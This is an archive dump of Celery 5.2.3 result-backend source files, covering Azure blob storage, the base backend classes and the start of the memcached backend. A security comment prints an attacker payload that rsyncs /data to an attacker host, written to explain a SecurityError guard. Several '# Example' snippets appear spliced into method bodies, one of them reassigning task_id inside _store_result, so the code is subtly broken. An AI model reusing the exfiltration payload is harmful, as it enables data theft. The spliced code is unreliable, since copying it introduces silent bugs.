""" key = bytes_to_str(key) LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key) blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) try: return blob_client.download_blob().readall().decode() except ResourceNotFoundError: return None def set(self, key, value): """Store a value for a given key. Args: key: The key at which to store the value. value: The value to store. """ key = bytes_to_str(key) LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}") blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) blob_client.upload_blob(value, overwrite=True) def mget(self, keys): """Read all the values for the provided keys. Args: keys: The list of keys to read. """ return [self.get(key) for key in keys] def delete(self, key): """Delete the value at a given key. Args: key: The key of the value to delete. """ key = bytes_to_str(key) LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}") blob_client = self._blob_service_client.get_blob_client( container=self._container_name, blob=f'{self.base_path}{key}', ) blob_client.delete_blob() def as_uri(self, include_password=False): if include_password: return ( f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' f'{self._connection_string}' ) connection_string_parts = self._connection_string.split(';') account_key_prefix = 'AccountKey=' redacted_connection_string_parts = [ f'{account_key_prefix}**' if part.startswith(account_key_prefix) else part for part in connection_string_parts ] return ( f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' f'{";".join(redacted_connection_string_parts)}' ) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640755259.0 celery-5.2.3/celery/backends/base.py0000664000175000017500000012330700000000000017224 0ustar00asifasif00000000000000"""Result backend base classes. - :class:`BaseBackend` defines the interface. - :class:`KeyValueStoreBackend` is a common base class using K/V semantics like _get and _put. 
""" import sys import time import warnings from collections import namedtuple from datetime import datetime, timedelta from functools import partial from weakref import WeakValueDictionary from billiard.einfo import ExceptionInfo from kombu.serialization import dumps, loads, prepare_accept_content from kombu.serialization import registry as serializer_registry from kombu.utils.encoding import bytes_to_str, ensure_bytes from kombu.utils.url import maybe_sanitize_url import celery.exceptions from celery import current_app, group, maybe_signature, states from celery._state import get_current_task from celery.app.task import Context from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, ImproperlyConfigured, NotRegistered, SecurityError, TaskRevokedError, TimeoutError) from celery.result import (GroupResult, ResultBase, ResultSet, allow_join_result, result_from_tuple) from celery.utils.collections import BufferMap from celery.utils.functional import LRUCache, arity_greater from celery.utils.log import get_logger from celery.utils.serialization import (create_exception_cls, ensure_serializable, get_pickleable_exception, get_pickled_exception, raise_with_context) from celery.utils.time import get_exponential_backoff_interval __all__ = ('BaseBackend', 'KeyValueStoreBackend', 'DisabledBackend') EXCEPTION_ABLE_CODECS = frozenset({'pickle'}) logger = get_logger(__name__) MESSAGE_BUFFER_MAX = 8192 pending_results_t = namedtuple('pending_results_t', ( 'concrete', 'weak', )) E_NO_BACKEND = """ No result backend is configured. Please see the documentation for more information. """ E_CHORD_NO_BACKEND = """ Starting chords requires a result backend to be configured. Note that a group chained with a task is also upgraded to be a chord, as this pattern requires synchronization. Result backends that supports chords: Redis, Database, Memcached, and more. """ def unpickle_backend(cls, args, kwargs): """Return an unpickled backend.""" return cls(*args, app=current_app._get_current_object(), **kwargs) class _nulldict(dict): def ignore(self, *a, **kw): pass __setitem__ = update = setdefault = ignore def _is_request_ignore_result(request): if request is None: return False return request.ignore_result class Backend: READY_STATES = states.READY_STATES UNREADY_STATES = states.UNREADY_STATES EXCEPTION_STATES = states.EXCEPTION_STATES TimeoutError = TimeoutError #: Time to sleep between polling each individual item #: in `ResultSet.iterate`. as opposed to the `interval` #: argument which is for each pass. subpolling_interval = None #: If true the backend must implement :meth:`get_many`. supports_native_join = False #: If true the backend must automatically expire results. #: The daily backend_cleanup periodic task won't be triggered #: in this case. supports_autoexpire = False #: Set to true if the backend is persistent by default. 
persistent = True retry_policy = { 'max_retries': 20, 'interval_start': 0, 'interval_step': 1, 'interval_max': 1, } def __init__(self, app, serializer=None, max_cached_results=None, accept=None, expires=None, expires_type=None, url=None, **kwargs): self.app = app conf = self.app.conf self.serializer = serializer or conf.result_serializer (self.content_type, self.content_encoding, self.encoder) = serializer_registry._encoders[self.serializer] cmax = max_cached_results or conf.result_cache_max self._cache = _nulldict() if cmax == -1 else LRUCache(limit=cmax) self.expires = self.prepare_expires(expires, expires_type) # precedence: accept, conf.result_accept_content, conf.accept_content self.accept = conf.result_accept_content if accept is None else accept self.accept = conf.accept_content if self.accept is None else self.accept self.accept = prepare_accept_content(self.accept) self.always_retry = conf.get('result_backend_always_retry', False) self.max_sleep_between_retries_ms = conf.get('result_backend_max_sleep_between_retries_ms', 10000) self.base_sleep_between_retries_ms = conf.get('result_backend_base_sleep_between_retries_ms', 10) self.max_retries = conf.get('result_backend_max_retries', float("inf")) self._pending_results = pending_results_t({}, WeakValueDictionary()) self._pending_messages = BufferMap(MESSAGE_BUFFER_MAX) self.url = url def as_uri(self, include_password=False): """Return the backend as an URI, sanitizing the password or not.""" # when using maybe_sanitize_url(), "/" is added # we're stripping it for consistency if include_password: return self.url url = maybe_sanitize_url(self.url or '') return url[:-1] if url.endswith(':///') else url def mark_as_started(self, task_id, **meta): """Mark a task as started.""" return self.store_result(task_id, meta, states.STARTED) def mark_as_done(self, task_id, result, request=None, store_result=True, state=states.SUCCESS): """Mark task as successfully executed.""" if (store_result and not _is_request_ignore_result(request)): self.store_result(task_id, result, state, request=request) if request and request.chord: self.on_chord_part_return(request, state, result) def mark_as_failure(self, task_id, exc, traceback=None, request=None, store_result=True, call_errbacks=True, state=states.FAILURE): """Mark task as executed with failure.""" if store_result: self.store_result(task_id, exc, state, traceback=traceback, request=request) if request: # This task may be part of a chord if request.chord: self.on_chord_part_return(request, state, exc) # It might also have chained tasks which need to be propagated to, # this is most likely to be exclusive with being a direct part of a # chord but we'll handle both cases separately. # # The `chain_data` try block here is a bit tortured since we might # have non-iterable objects here in tests and it's easier this way. try: chain_data = iter(request.chain) except (AttributeError, TypeError): chain_data = tuple() for chain_elem in chain_data: # Reconstruct a `Context` object for the chained task which has # enough information to for backends to work with chain_elem_ctx = Context(chain_elem) chain_elem_ctx.update(chain_elem_ctx.options) chain_elem_ctx.id = chain_elem_ctx.options.get('task_id') chain_elem_ctx.group = chain_elem_ctx.options.get('group_id') # If the state should be propagated, we'll do so for all # elements of the chain. This is only truly important so # that the last chain element which controls completion of # the chain itself is marked as completed to avoid stalls. 
# # Some chained elements may be complex signatures and have no # task ID of their own, so we skip them hoping that not # descending through them is OK. If the last chain element is # complex, we assume it must have been uplifted to a chord by # the canvas code and therefore the condition below will ensure # that we mark something as being complete as avoid stalling. if ( store_result and state in states.PROPAGATE_STATES and chain_elem_ctx.task_id is not None ): self.store_result( chain_elem_ctx.task_id, exc, state, traceback=traceback, request=chain_elem_ctx, ) # If the chain element is a member of a chord, we also need # to call `on_chord_part_return()` as well to avoid stalls. if 'chord' in chain_elem_ctx.options: self.on_chord_part_return(chain_elem_ctx, state, exc) # And finally we'll fire any errbacks if call_errbacks and request.errbacks: self._call_task_errbacks(request, exc, traceback) def _call_task_errbacks(self, request, exc, traceback): old_signature = [] for errback in request.errbacks: errback = self.app.signature(errback) if not errback._app: # Ensure all signatures have an application errback._app = self.app try: if ( # Celery tasks type created with the @task decorator have # the __header__ property, but Celery task created from # Task class do not have this property. # That's why we have to check if this property exists # before checking is it partial function. hasattr(errback.type, '__header__') and # workaround to support tasks with bind=True executed as # link errors. Otherwise retries can't be used not isinstance(errback.type.__header__, partial) and arity_greater(errback.type.__header__, 1) ): errback(request, exc, traceback) else: old_signature.append(errback) except NotRegistered: # Task may not be present in this worker. # We simply send it forward for another worker to consume. # If the task is not registered there, the worker will raise # NotRegistered. old_signature.append(errback) if old_signature: # Previously errback was called as a task so we still # need to do so if the errback only takes a single task_id arg. task_id = request.id root_id = request.root_id or task_id g = group(old_signature, app=self.app) if self.app.conf.task_always_eager or request.delivery_info.get('is_eager', False): g.apply( (task_id,), parent_id=task_id, root_id=root_id ) else: g.apply_async( (task_id,), parent_id=task_id, root_id=root_id ) def mark_as_revoked(self, task_id, reason='', request=None, store_result=True, state=states.REVOKED): exc = TaskRevokedError(reason) if store_result: self.store_result(task_id, exc, state, traceback=None, request=request) if request and request.chord: self.on_chord_part_return(request, state, exc) def mark_as_retry(self, task_id, exc, traceback=None, request=None, store_result=True, state=states.RETRY): """Mark task as being retries. Note: Stores the current exception (if any). """ return self.store_result(task_id, exc, state, traceback=traceback, request=request) def chord_error_from_stack(self, callback, exc=None): app = self.app try: backend = app._tasks[callback.task].backend except KeyError: backend = self # We have to make a fake request since either the callback failed or # we're pretending it did since we don't have information about the # chord part(s) which failed. This request is constructed as a best # effort for new style errbacks and may be slightly misleading about # what really went wrong, but at least we call them! 
fake_request = Context({ "id": callback.options.get("task_id"), "errbacks": callback.options.get("link_error", []), "delivery_info": dict(), **callback }) try: self._call_task_errbacks(fake_request, exc, None) except Exception as eb_exc: # pylint: disable=broad-except return backend.fail_from_current_stack(callback.id, exc=eb_exc) else: return backend.fail_from_current_stack(callback.id, exc=exc) def fail_from_current_stack(self, task_id, exc=None): type_, real_exc, tb = sys.exc_info() try: exc = real_exc if exc is None else exc exception_info = ExceptionInfo((type_, exc, tb)) self.mark_as_failure(task_id, exc, exception_info.traceback) return exception_info finally: while tb is not None: try: tb.tb_frame.clear() tb.tb_frame.f_locals except RuntimeError: # Ignore the exception raised if the frame is still executing. pass tb = tb.tb_next del tb def prepare_exception(self, exc, serializer=None): """Prepare exception for serialization.""" serializer = self.serializer if serializer is None else serializer if serializer in EXCEPTION_ABLE_CODECS: return get_pickleable_exception(exc) exctype = type(exc) return {'exc_type': getattr(exctype, '__qualname__', exctype.__name__), 'exc_message': ensure_serializable(exc.args, self.encode), 'exc_module': exctype.__module__} def exception_to_python(self, exc): """Convert serialized exception to Python exception.""" if not exc: return None elif isinstance(exc, BaseException): if self.serializer in EXCEPTION_ABLE_CODECS: exc = get_pickled_exception(exc) return exc elif not isinstance(exc, dict): try: exc = dict(exc) except TypeError as e: raise TypeError(f"If the stored exception isn't an " f"instance of " f"BaseException, it must be a dictionary.\n" f"Instead got: {exc}") from e exc_module = exc.get('exc_module') try: exc_type = exc['exc_type'] except KeyError as e: raise ValueError("Exception information must include" "the exception type") from e if exc_module is None: cls = create_exception_cls( exc_type, __name__) else: try: # Load module and find exception class in that cls = sys.modules[exc_module] # The type can contain qualified name with parent classes for name in exc_type.split('.'): cls = getattr(cls, name) except (KeyError, AttributeError): cls = create_exception_cls(exc_type, celery.exceptions.__name__) exc_msg = exc.get('exc_message', '') # If the recreated exception type isn't indeed an exception, # this is a security issue. Without the condition below, an attacker # could exploit a stored command vulnerability to execute arbitrary # python code such as: # os.system("rsync /data attacker@192.168.56.100:~/data") # The attacker sets the task's result to a failure in the result # backend with the os as the module, the system function as the # exception type and the payload # rsync /data attacker@192.168.56.100:~/data # as the exception arguments like so: # { # "exc_module": "os", # "exc_type": "system", # "exc_message": "rsync /data attacker@192.168.56.100:~/data" # } if not isinstance(cls, type) or not issubclass(cls, BaseException): fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}' raise SecurityError( f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}") # XXX: Without verifying `cls` is actually an exception class, # an attacker could execute arbitrary python code. # cls could be anything, even eval(). 
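# Example: the wire format of an exception under a non-pickle serializer such
# as JSON. A rough sketch of what prepare_exception() above produces and what
# exception_to_python() expects back; the ValueError and its message are
# illustrative only.
example_failure_payload = {
    'exc_type': 'ValueError',    # taken from type(exc).__qualname__
    'exc_message': ['boom'],     # exc.args, made serializable
    'exc_module': 'builtins',    # module the class is resolved from
}
# exception_to_python() resolves 'ValueError' inside 'builtins' and rebuilds
# ValueError('boom'); anything that does not resolve to a BaseException
# subclass is rejected with SecurityError, as the guard above explains.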
try: if isinstance(exc_msg, (tuple, list)): exc = cls(*exc_msg) else: exc = cls(exc_msg) except Exception as err: # noqa exc = Exception(f'{cls}({exc_msg})') return exc def prepare_value(self, result): """Prepare value for storage.""" if self.serializer != 'pickle' and isinstance(result, ResultBase): return result.as_tuple() return result def encode(self, data): _, _, payload = self._encode(data) return payload def _encode(self, data): return dumps(data, serializer=self.serializer) def meta_from_decoded(self, meta): if meta['status'] in self.EXCEPTION_STATES: meta['result'] = self.exception_to_python(meta['result']) return meta def decode_result(self, payload): return self.meta_from_decoded(self.decode(payload)) def decode(self, payload): if payload is None: return payload payload = payload or str(payload) return loads(payload, content_type=self.content_type, content_encoding=self.content_encoding, accept=self.accept) def prepare_expires(self, value, type=None): if value is None: value = self.app.conf.result_expires if isinstance(value, timedelta): value = value.total_seconds() if value is not None and type: return type(value) return value def prepare_persistent(self, enabled=None): if enabled is not None: return enabled persistent = self.app.conf.result_persistent return self.persistent if persistent is None else persistent def encode_result(self, result, state): if state in self.EXCEPTION_STATES and isinstance(result, Exception): return self.prepare_exception(result) return self.prepare_value(result) def is_cached(self, task_id): return task_id in self._cache def _get_result_meta(self, result, state, traceback, request, format_date=True, encode=False): if state in self.READY_STATES: date_done = datetime.utcnow() if format_date: date_done = date_done.isoformat() else: date_done = None meta = { 'status': state, 'result': result, 'traceback': traceback, 'children': self.current_task_children(request), 'date_done': date_done, } if request and getattr(request, 'group', None): meta['group_id'] = request.group if request and getattr(request, 'parent_id', None): meta['parent_id'] = request.parent_id if self.app.conf.find_value_for_key('extended', 'result'): if request: request_meta = { 'name': getattr(request, 'task', None), 'args': getattr(request, 'args', None), 'kwargs': getattr(request, 'kwargs', None), 'worker': getattr(request, 'hostname', None), 'retries': getattr(request, 'retries', None), 'queue': request.delivery_info.get('routing_key') if hasattr(request, 'delivery_info') and request.delivery_info else None } if encode: # args and kwargs need to be encoded properly before saving encode_needed_fields = {"args", "kwargs"} for field in encode_needed_fields: value = request_meta[field] encoded_value = self.encode(value) request_meta[field] = ensure_bytes(encoded_value) meta.update(request_meta) return meta def _sleep(self, amount): time.sleep(amount) def store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): """Update task state and result. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. 
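# Example: the shape of the metadata built by _get_result_meta() above for a
# successful task. A sketch only; the values are illustrative. When the
# result_extended setting is enabled, extra fields (name, args, kwargs,
# worker, retries, queue) are merged in, and the key/value store backends
# later add 'task_id' before encoding.
example_task_meta = {
    'status': 'SUCCESS',
    'result': 42,
    'traceback': None,
    'children': [],
    'date_done': '2021-12-29T07:11:34.863757',  # ISO 8601 when format_date=True
}
# 'group_id' and 'parent_id' appear only when the originating request carries
# a group or a parent task.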
""" result = self.encode_result(result, state) retries = 0 while True: try: self._store_result(task_id, result, state, traceback, request=request, **kwargs) return result except Exception as exc: if self.always_retry and self.exception_safe_to_retry(exc): if retries < self.max_retries: retries += 1 # get_exponential_backoff_interval computes integers # and time.sleep accept floats for sub second sleep sleep_amount = get_exponential_backoff_interval( self.base_sleep_between_retries_ms, retries, self.max_sleep_between_retries_ms, True) / 1000 self._sleep(sleep_amount) else: raise_with_context( BackendStoreError("failed to store result on the backend", task_id=task_id, state=state), ) else: raise def forget(self, task_id): self._cache.pop(task_id, None) self._forget(task_id) def _forget(self, task_id): raise NotImplementedError('backend does not implement forget.') def get_state(self, task_id): """Get the state of a task.""" return self.get_task_meta(task_id)['status'] get_status = get_state # XXX compat def get_traceback(self, task_id): """Get the traceback for a failed task.""" return self.get_task_meta(task_id).get('traceback') def get_result(self, task_id): """Get the result of a task.""" return self.get_task_meta(task_id).get('result') def get_children(self, task_id): """Get the list of subtasks sent by a task.""" try: return self.get_task_meta(task_id)['children'] except KeyError: pass def _ensure_not_eager(self): if self.app.conf.task_always_eager: warnings.warn( "Shouldn't retrieve result with task_always_eager enabled.", RuntimeWarning ) def exception_safe_to_retry(self, exc): """Check if an exception is safe to retry. Backends have to overload this method with correct predicates dealing with their exceptions. By default no exception is safe to retry, it's up to backend implementation to define which exceptions are safe. """ return False def get_task_meta(self, task_id, cache=True): """Get task meta from backend. if always_retry_backend_operation is activated, in the event of a recoverable exception, then retry operation with an exponential backoff until a limit has been reached. 
""" self._ensure_not_eager() if cache: try: return self._cache[task_id] except KeyError: pass retries = 0 while True: try: meta = self._get_task_meta_for(task_id) break except Exception as exc: if self.always_retry and self.exception_safe_to_retry(exc): if retries < self.max_retries: retries += 1 # get_exponential_backoff_interval computes integers # and time.sleep accept floats for sub second sleep sleep_amount = get_exponential_backoff_interval( self.base_sleep_between_retries_ms, retries, self.max_sleep_between_retries_ms, True) / 1000 self._sleep(sleep_amount) else: raise_with_context( BackendGetMetaError("failed to get meta", task_id=task_id), ) else: raise if cache and meta.get('status') == states.SUCCESS: self._cache[task_id] = meta return meta def reload_task_result(self, task_id): """Reload task result, even if it has been previously fetched.""" self._cache[task_id] = self.get_task_meta(task_id, cache=False) def reload_group_result(self, group_id): """Reload group result, even if it has been previously fetched.""" self._cache[group_id] = self.get_group_meta(group_id, cache=False) def get_group_meta(self, group_id, cache=True): self._ensure_not_eager() if cache: try: return self._cache[group_id] except KeyError: pass meta = self._restore_group(group_id) if cache and meta is not None: self._cache[group_id] = meta return meta def restore_group(self, group_id, cache=True): """Get the result for a group.""" meta = self.get_group_meta(group_id, cache=cache) if meta: return meta['result'] def save_group(self, group_id, result): """Store the result of an executed group.""" return self._save_group(group_id, result) def delete_group(self, group_id): self._cache.pop(group_id, None) return self._delete_group(group_id) def cleanup(self): """Backend cleanup.""" def process_cleanup(self): """Cleanup actions to do at the end of a task worker process.""" def on_task_call(self, producer, task_id): return {} def add_to_chord(self, chord_id, result): raise NotImplementedError('Backend does not support add_to_chord') def on_chord_part_return(self, request, state, result, **kwargs): pass def set_chord_size(self, group_id, chord_size): pass def fallback_chord_unlock(self, header_result, body, countdown=1, **kwargs): kwargs['result'] = [r.as_tuple() for r in header_result] try: body_type = getattr(body, 'type', None) except NotRegistered: body_type = None queue = body.options.get('queue', getattr(body_type, 'queue', None)) if queue is None: # fallback to default routing if queue name was not # explicitly passed to body callback queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name priority = body.options.get('priority', getattr(body_type, 'priority', 0)) self.app.tasks['celery.chord_unlock'].apply_async( (header_result.id, body,), kwargs, countdown=countdown, queue=queue, priority=priority, ) def ensure_chords_allowed(self): pass def apply_chord(self, header_result_args, body, **kwargs): self.ensure_chords_allowed() header_result = self.app.GroupResult(*header_result_args) self.fallback_chord_unlock(header_result, body, **kwargs) def current_task_children(self, request=None): request = request or getattr(get_current_task(), 'request', None) if request: return [r.as_tuple() for r in getattr(request, 'children', [])] def __reduce__(self, args=(), kwargs=None): kwargs = {} if not kwargs else kwargs return (unpickle_backend, (self.__class__, args, kwargs)) class SyncBackendMixin: def iter_native(self, result, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None): 
self._ensure_not_eager() results = result.results if not results: return task_ids = set() for result in results: if isinstance(result, ResultSet): yield result.id, result.results else: task_ids.add(result.id) yield from self.get_many( task_ids, timeout=timeout, interval=interval, no_ack=no_ack, on_message=on_message, on_interval=on_interval, ) def wait_for_pending(self, result, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None, callback=None, propagate=True): self._ensure_not_eager() if on_message is not None: raise ImproperlyConfigured( 'Backend does not support on_message callback') meta = self.wait_for( result.id, timeout=timeout, interval=interval, on_interval=on_interval, no_ack=no_ack, ) if meta: result._maybe_set_cache(meta) return result.maybe_throw(propagate=propagate, callback=callback) def wait_for(self, task_id, timeout=None, interval=0.5, no_ack=True, on_interval=None): """Wait for task and return its result. If the task raises an exception, this exception will be re-raised by :func:`wait_for`. Raises: celery.exceptions.TimeoutError: If `timeout` is not :const:`None`, and the operation takes longer than `timeout` seconds. """ self._ensure_not_eager() time_elapsed = 0.0 while 1: meta = self.get_task_meta(task_id) if meta['status'] in states.READY_STATES: return meta if on_interval: on_interval() # avoid hammering the CPU checking status. time.sleep(interval) time_elapsed += interval if timeout and time_elapsed >= timeout: raise TimeoutError('The operation timed out.') def add_pending_result(self, result, weak=False): return result def remove_pending_result(self, result): return result @property def is_async(self): return False class BaseBackend(Backend, SyncBackendMixin): """Base (synchronous) result backend.""" BaseDictBackend = BaseBackend # XXX compat class BaseKeyValueStoreBackend(Backend): key_t = ensure_bytes task_keyprefix = 'celery-task-meta-' group_keyprefix = 'celery-taskset-meta-' chord_keyprefix = 'chord-unlock-' implements_incr = False def __init__(self, *args, **kwargs): if hasattr(self.key_t, '__func__'): # pragma: no cover self.key_t = self.key_t.__func__ # remove binding self._encode_prefixes() super().__init__(*args, **kwargs) if self.implements_incr: self.apply_chord = self._apply_chord_incr def _encode_prefixes(self): self.task_keyprefix = self.key_t(self.task_keyprefix) self.group_keyprefix = self.key_t(self.group_keyprefix) self.chord_keyprefix = self.key_t(self.chord_keyprefix) def get(self, key): raise NotImplementedError('Must implement the get method.') def mget(self, keys): raise NotImplementedError('Does not support get_many') def _set_with_state(self, key, value, state): return self.set(key, value) def set(self, key, value): raise NotImplementedError('Must implement the set method.') def delete(self, key): raise NotImplementedError('Must implement the delete method') def incr(self, key): raise NotImplementedError('Does not implement incr') def expire(self, key, value): pass def get_key_for_task(self, task_id, key=''): """Get the cache key for a task by id.""" key_t = self.key_t return key_t('').join([ self.task_keyprefix, key_t(task_id), key_t(key), ]) def get_key_for_group(self, group_id, key=''): """Get the cache key for a group by id.""" key_t = self.key_t return key_t('').join([ self.group_keyprefix, key_t(group_id), key_t(key), ]) def get_key_for_chord(self, group_id, key=''): """Get the cache key for the chord waiting on group with given id.""" key_t = self.key_t return key_t('').join([ self.chord_keyprefix, 
key_t(group_id), key_t(key), ]) def _strip_prefix(self, key): """Take bytes: emit string.""" key = self.key_t(key) for prefix in self.task_keyprefix, self.group_keyprefix: if key.startswith(prefix): return bytes_to_str(key[len(prefix):]) return bytes_to_str(key) def _filter_ready(self, values, READY_STATES=states.READY_STATES): for k, value in values: if value is not None: value = self.decode_result(value) if value['status'] in READY_STATES: yield k, value def _mget_to_results(self, values, keys, READY_STATES=states.READY_STATES): if hasattr(values, 'items'): # client returns dict so mapping preserved. return { self._strip_prefix(k): v for k, v in self._filter_ready(values.items(), READY_STATES) } else: # client returns list so need to recreate mapping. return { bytes_to_str(keys[i]): v for i, v in self._filter_ready(enumerate(values), READY_STATES) } def get_many(self, task_ids, timeout=None, interval=0.5, no_ack=True, on_message=None, on_interval=None, max_iterations=None, READY_STATES=states.READY_STATES): interval = 0.5 if interval is None else interval ids = task_ids if isinstance(task_ids, set) else set(task_ids) cached_ids = set() cache = self._cache for task_id in ids: try: cached = cache[task_id] except KeyError: pass else: if cached['status'] in READY_STATES: yield bytes_to_str(task_id), cached cached_ids.add(task_id) ids.difference_update(cached_ids) iterations = 0 while ids: keys = list(ids) r = self._mget_to_results(self.mget([self.get_key_for_task(k) for k in keys]), keys, READY_STATES) cache.update(r) ids.difference_update({bytes_to_str(v) for v in r}) for key, value in r.items(): if on_message is not None: on_message(value) yield bytes_to_str(key), value if timeout and iterations * interval >= timeout: raise TimeoutError(f'Operation timed out ({timeout})') if on_interval: on_interval() time.sleep(interval) # don't busy loop. iterations += 1 if max_iterations and iterations >= max_iterations: break def _forget(self, task_id): self.delete(self.get_key_for_task(task_id)) def _store_result(self, task_id, result, state, traceback=None, request=None, **kwargs): meta = self._get_result_meta(result=result, state=state, traceback=traceback, request=request) meta['task_id'] = bytes_to_str(task_id) # Retrieve metadata from the backend, if the status # is a success then we ignore any following update to the state. # This solves a task deduplication issue because of network # partitioning or lost workers. This issue involved a race condition # making a lost task overwrite the last successful result in the # result backend. 
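# Example: how task and group keys are laid out in a key/value store. A small
# sketch mirroring get_key_for_task()/get_key_for_group() above; the UUID is
# illustrative.
task_id = 'd7f9bdf1-6f77-4f7e-9e06-8f7b2c9f51bb'
task_key = b'celery-task-meta-' + task_id.encode()      # written by _store_result()
group_key = b'celery-taskset-meta-' + task_id.encode()  # written by _save_group()
# _strip_prefix() reverses this mapping when get_many() turns raw keys back
# into task ids.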
current_meta = self._get_task_meta_for(task_id) if current_meta['status'] == states.SUCCESS: return result try: self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state) except BackendStoreError as ex: raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex return result def _save_group(self, group_id, result): self._set_with_state(self.get_key_for_group(group_id), self.encode({'result': result.as_tuple()}), states.SUCCESS) return result def _delete_group(self, group_id): self.delete(self.get_key_for_group(group_id)) def _get_task_meta_for(self, task_id): """Get task meta-data for a task by id.""" meta = self.get(self.get_key_for_task(task_id)) if not meta: return {'status': states.PENDING, 'result': None} return self.decode_result(meta) def _restore_group(self, group_id): """Get task meta-data for a task by id.""" meta = self.get(self.get_key_for_group(group_id)) # previously this was always pickled, but later this # was extended to support other serializers, so the # structure is kind of weird. if meta: meta = self.decode(meta) result = meta['result'] meta['result'] = result_from_tuple(result, self.app) return meta def _apply_chord_incr(self, header_result_args, body, **kwargs): self.ensure_chords_allowed() header_result = self.app.GroupResult(*header_result_args) header_result.save(backend=self) def on_chord_part_return(self, request, state, result, **kwargs): if not self.implements_incr: return app = self.app gid = request.group if not gid: return key = self.get_key_for_chord(gid) try: deps = GroupResult.restore(gid, backend=self) except Exception as exc: # pylint: disable=broad-except callback = maybe_signature(request.chord, app=app) logger.exception('Chord %r raised: %r', gid, exc) return self.chord_error_from_stack( callback, ChordError(f'Cannot restore group: {exc!r}'), ) if deps is None: try: raise ValueError(gid) except ValueError as exc: callback = maybe_signature(request.chord, app=app) logger.exception('Chord callback %r raised: %r', gid, exc) return self.chord_error_from_stack( callback, ChordError(f'GroupResult {gid} no longer exists'), ) val = self.incr(key) # Set the chord size to the value defined in the request, or fall back # to the number of dependencies we can see from the restored result size = request.chord.get("chord_size") if size is None: size = len(deps) if val > size: # pragma: no cover logger.warning('Chord counter incremented too many times for %r', gid) elif val == size: callback = maybe_signature(request.chord, app=app) j = deps.join_native if deps.supports_native_join else deps.join try: with allow_join_result(): ret = j( timeout=app.conf.result_chord_join_timeout, propagate=True) except Exception as exc: # pylint: disable=broad-except try: culprit = next(deps._failed_join_report()) reason = 'Dependency {0.id} raised {1!r}'.format( culprit, exc, ) except StopIteration: reason = repr(exc) logger.exception('Chord %r raised: %r', gid, reason) self.chord_error_from_stack(callback, ChordError(reason)) else: try: callback.delay(ret) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', gid, exc) self.chord_error_from_stack( callback, ChordError(f'Callback error: {exc!r}'), ) finally: deps.delete() self.client.delete(key) else: self.expire(key, self.expires) class KeyValueStoreBackend(BaseKeyValueStoreBackend, SyncBackendMixin): """Result backend base class for key/value stores.""" class DisabledBackend(BaseBackend): """Dummy result backend.""" _cache = {} # need this attribute to 
reset cache in tests. def store_result(self, *args, **kwargs): pass def ensure_chords_allowed(self): raise NotImplementedError(E_CHORD_NO_BACKEND.strip()) def _is_disabled(self, *args, **kwargs): raise NotImplementedError(E_NO_BACKEND.strip()) def as_uri(self, *args, **kwargs): return 'disabled://' get_state = get_status = get_result = get_traceback = _is_disabled get_task_meta_for = wait_for = get_many = _is_disabled ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/backends/cache.py0000664000175000017500000001132100000000000017345 0ustar00asifasif00000000000000"""Memcached and in-memory cache result backend.""" from kombu.utils.encoding import bytes_to_str, ensure_bytes from kombu.utils.objects import cached_property from celery.exceptions import ImproperlyConfigured from celery.utils.functional import LRUCache from .base import KeyValueStoreBackend __all__ = ('CacheBackend',) _imp = [None] REQUIRES_BACKEND = """\ The Memcached backend requires either pylibmc or python-memcached.\ """ UNKNOWN_BACKEND = """\ The cache backend {0!r} is unknown, Please use one of the following backends instead: {1}\ """ # Global shared in-memory cache for in-memory cache client # This is to share cache between threads _DUMMY_CLIENT_CACHE = LRUCache(limit=5000) def import_best_memcache(): if _imp[0] is None: is_pylibmc, memcache_key_t = False, bytes_to_str try: import pylibmc as memcache is_pylibmc = True except ImportError: try: import memcache except ImportError: raise ImproperlyConfigured(REQUIRES_BACKEND) _imp[0] = (is_pylibmc, memcache, memcache_key_t) return _imp[0] def get_best_memcache(*args, **kwargs): # pylint: disable=unpacking-non-sequence # This is most definitely a sequence, but pylint thinks it's not. 
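# Example: a chord, which is what on_chord_part_return()/_apply_chord_incr()
# above exist to support. A minimal sketch; the broker/backend URLs are
# placeholders and `add`/`tsum` are hypothetical tasks that require a running
# worker to execute.
from celery import Celery, chord

app = Celery('example',
             broker='redis://localhost:6379/0',
             backend='redis://localhost:6379/1')

@app.task
def add(x, y):
    return x + y

@app.task
def tsum(numbers):
    return sum(numbers)

# Counter-based backends (implements_incr=True, e.g. the cache backend below)
# track chord completion by incrementing a per-group key each time a header
# task finishes; once the counter reaches the chord size, the body is called.
result = chord(add.s(i, i) for i in range(10))(tsum.s())
print(result.get())  # -> 90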
